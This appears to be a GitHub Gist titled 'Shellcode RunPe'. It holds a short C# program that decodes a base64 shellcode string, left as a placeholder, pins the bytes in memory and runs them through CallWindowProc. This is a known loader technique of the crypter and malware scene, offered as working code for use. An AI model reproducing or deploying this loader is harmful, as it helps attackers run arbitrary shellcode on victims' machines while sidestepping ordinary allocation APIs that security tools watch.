Created
September 2, 2018 06:39
-
-
Save decay88/8629acaf2f53caf29b003e2ca88dba97 to your computer and use it in GitHub Desktop.
Shellcode RunPe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using System.Diagnostics; | |
| // Author : Souhardya Sardar | |
| // Date : 13/01/2017 | |
| public class RunPE | |
| { | |
| [DllImport("user32.dll")] | |
| private static extern int CallWindowProc(IntPtr lpPrevWndFunc, IntPtr hWnd, IntPtr Msg, int wParam, int lParam); | |
| private delegate int Win32WndProc(IntPtr hWnd, int Msg, int wParam, int lParam); | |
| public static void Main() | |
| { | |
| string exePath = "C://sexyass.exe"; | |
| string shellcodeBytes = "[BASE64 SHELLCODE HERE]"; | |
| byte[] base64 = Convert.FromBase64String(shellcodeBytes); | |
| IntPtr strPtr = Marshal.StringToHGlobalUni(exePath); // initialse | |
| /* | |
| This method was actively being used by VB and autoit guys | |
| ~ uses CallWindowProcEx | |
| */ | |
| GCHandle array = GCHandle.Alloc(base64, GCHandleType.Pinned); // can use VirtualAllocEx nvm | |
| IntPtr pointer = array.AddrOfPinnedObject(); // data allocation pointer | |
| CallWindowProc(pointer, strPtr, pointer, 0, 0); // finalise | |
| array.Free(); // deallocate the handle | |
| } | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment